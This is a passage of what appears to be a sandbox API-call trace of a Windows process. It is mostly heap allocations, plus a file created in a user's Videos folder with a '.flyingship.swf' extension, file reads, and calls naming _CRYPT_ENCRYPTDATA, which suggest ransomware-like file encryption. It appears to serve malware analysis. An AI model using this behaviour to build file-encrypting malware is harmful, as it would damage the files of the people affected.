Size=0x10) returned 0x9ba018 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.305] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t")) returned 0x10 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\mmrkxsc9iiz.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0198.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0198.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.309] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.309] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8c35, lpOverlapped=0x0) returned 1 [0198.313] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c35) returned 0xbea018 [0198.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c35) returned 0xbf2c58 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c35) returned 0xbea018 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.315] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c35) returned 0xbea018 [0198.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c35) returned 0xbfb898 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0198.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0198.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.318] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.319] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.320] 